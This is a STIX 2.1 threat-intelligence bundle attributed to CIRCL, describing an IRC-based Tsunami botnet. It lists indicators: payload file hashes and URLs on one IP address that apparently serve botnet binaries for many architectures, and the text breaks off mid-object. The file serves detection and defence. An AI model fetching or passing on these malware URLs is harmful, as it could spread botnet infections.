{
|
|
|
|
"type": "bundle",
|
|
|
|
"id": "bundle--5cc410a0-be10-4990-acf6-44cc02de0b81",
|
|
|
|
"objects": [
|
|
|
|
{
|
|
|
|
"type": "identity",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T09:04:26.000Z",
|
|
|
|
"modified": "2019-04-27T09:04:26.000Z",
|
|
|
|
"name": "CIRCL",
|
|
|
|
"identity_class": "organization"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "report",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "report--5cc410a0-be10-4990-acf6-44cc02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T09:04:26.000Z",
|
|
|
|
"modified": "2019-04-27T09:04:26.000Z",
|
|
|
|
"name": "OSINT - Analysis of an IRC based Botnet",
|
|
|
|
"published": "2019-04-27T09:04:47Z",
|
|
|
|
"object_refs": [
|
|
|
|
"indicator--5cc410ae-1374-4513-b215-479e02de0b81",
|
|
|
|
"indicator--5cc4179d-5500-4efe-a798-492b02de0b81",
|
|
|
|
"indicator--5cc4179d-bff0-47d9-aadc-4c0e02de0b81",
|
|
|
|
"indicator--5cc4179d-c50c-43dd-905d-4e5f02de0b81",
|
|
|
|
"indicator--5cc4179d-d280-413b-9c00-492c02de0b81",
|
|
|
|
"indicator--5cc4179d-5b24-41a5-97b7-4c6802de0b81",
|
|
|
|
"indicator--5cc4179d-15ec-4cc3-a885-44c702de0b81",
|
|
|
|
"indicator--5cc4179d-f0bc-4279-a64b-478a02de0b81",
|
|
|
|
"indicator--5cc4179d-023c-4b02-ae81-43bf02de0b81",
|
|
|
|
"indicator--5cc4179d-9a80-4f29-af94-4ccd02de0b81",
|
|
|
|
"indicator--5cc4179d-ef0c-426c-9b7c-4e3802de0b81",
|
|
|
|
"indicator--5cc4179d-1d2c-4f08-861f-4a8802de0b81",
|
|
|
|
"indicator--5cc4179d-a5f4-4644-8938-448102de0b81",
|
|
|
|
"indicator--5cc4179d-ecc4-4beb-b4f1-4f8902de0b81",
|
|
|
|
"indicator--5cc4179d-4048-4450-913a-415a02de0b81",
|
|
|
|
"indicator--5cc41804-cc64-4ea0-ac90-41a702de0b81",
|
|
|
|
"indicator--5cc41804-b52c-4fc2-9cc7-4b2502de0b81",
|
|
|
|
"indicator--5cc41804-2b74-4df3-9d09-4d0d02de0b81",
|
|
|
|
"indicator--5cc41804-7878-4dcf-a69c-474802de0b81",
|
|
|
|
"indicator--5cc41804-7f90-42a3-8865-4b6e02de0b81",
|
|
|
|
"indicator--5cc41804-dbd0-464c-b6de-462202de0b81",
|
|
|
|
"indicator--5cc41804-235c-49fe-8303-4a8e02de0b81",
|
|
|
|
"indicator--5cc41804-58f0-4fff-810e-472d02de0b81",
|
|
|
|
"indicator--5cc41804-a4c8-4691-8b09-443902de0b81",
|
|
|
|
"indicator--5cc41804-31dc-4d16-b61e-4b6502de0b81",
|
|
|
|
"observed-data--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
"url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
"indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
"x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
|
|
|
|
"indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
"x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
|
|
|
|
"malware--5cc417e0-af4c-4df0-974b-4cd102de0b81",
|
|
|
|
"indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
"x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e",
|
|
|
|
"indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
"x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b",
|
|
|
|
"indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
"x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03",
|
|
|
|
"indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
"x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
|
|
|
|
"indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
"x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227",
|
|
|
|
"indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
"x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
|
|
|
|
"indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
"x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85",
|
|
|
|
"indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
"x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99",
|
|
|
|
"indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
"x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
|
|
|
|
"indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
"x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
"relationship--a96edda1-d092-4dd0-af57-c4ec6e515813",
|
|
|
|
"relationship--344620c9-c971-4ce1-966a-5b9e488737e3",
|
|
|
|
"relationship--828352e8-cc6c-461b-aa18-b2d096986df2",
|
|
|
|
"relationship--14b0f5bb-f5e5-4de5-bac5-a58d90a9e163",
|
|
|
|
"relationship--78d3dd0d-6663-4d17-a7cb-3983707cab4e",
|
|
|
|
"relationship--5688cf5d-171b-401e-b6db-3ae4cd296575",
|
|
|
|
"relationship--4df963aa-df8f-441b-8691-746d3c84f53e",
|
|
|
|
"relationship--d1e4b811-8eb2-4771-a5e7-8bb521dccb9c",
|
|
|
|
"relationship--00a0e852-f869-48e3-982f-fe0563bba27f",
|
|
|
|
"relationship--428a5c1e-e690-4ab7-9299-f1c7cb62c846",
|
|
|
|
"relationship--c7e409d3-15cf-48af-9335-be17e90ba8f5",
|
|
|
|
"relationship--d495eb83-bb8d-4a9b-b147-6fee2b7f77b4",
|
|
|
|
"relationship--c1aa6872-94cb-4dea-86e5-9f6a72cbb392",
|
|
|
|
"relationship--6e29b60b-1642-49e4-a253-79a672c93ce6"
],
|
|
|
|
"labels": [
|
|
|
|
"Threat-Report",
|
|
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
|
|
"type:OSINT",
|
|
|
|
"osint:lifetime=\"perpetual\"",
|
|
|
|
"osint:certainty=\"50\"",
|
|
|
|
"misp-galaxy:malpedia=\"Tsunami\"",
|
|
|
|
"ddos:type=\"flooding-attack\"",
|
|
|
|
"ecsirt:availability=\"ddos\""
|
|
|
|
],
|
|
|
|
"object_marking_refs": [
|
|
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc410ae-1374-4513-b215-479e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:19:58.000Z",
|
|
|
|
"modified": "2019-04-27T08:19:58.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:19:58Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-5500-4efe-a798-492b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/mips']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-bff0-47d9-aadc-4c0e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/mipsel']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-c50c-43dd-905d-4e5f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/sh4']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-d280-413b-9c00-492c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/x86']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-5b24-41a5-97b7-4c6802de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv7l']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-15ec-4cc3-a885-44c702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv6l']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-f0bc-4279-a64b-478a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/i686']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-023c-4b02-ae81-43bf02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/powerpc']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-9a80-4f29-af94-4ccd02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/i586']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-ef0c-426c-9b7c-4e3802de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/m68k']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-1d2c-4f08-861f-4a8802de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/sparc']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-a5f4-4644-8938-448102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv4l']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-ecc4-4beb-b4f1-4f8902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/armv5l']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc4179d-4048-4450-913a-415a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:49:33.000Z",
|
|
|
|
"modified": "2019-04-27T08:49:33.000Z",
|
|
|
|
"pattern": "[url:value = 'http://185.244.25.235/440fp']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:49:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Network activity"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"url\"",
|
|
|
|
"misp:category=\"Network activity\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-cc64-4ea0-ac90-41a702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-b52c-4fc2-9cc7-4b2502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-2b74-4df3-9d09-4d0d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-7878-4dcf-a69c-474802de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-7f90-42a3-8865-4b6e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-dbd0-464c-b6de-462202de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5cc41804-235c-49fe-8303-4a8e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
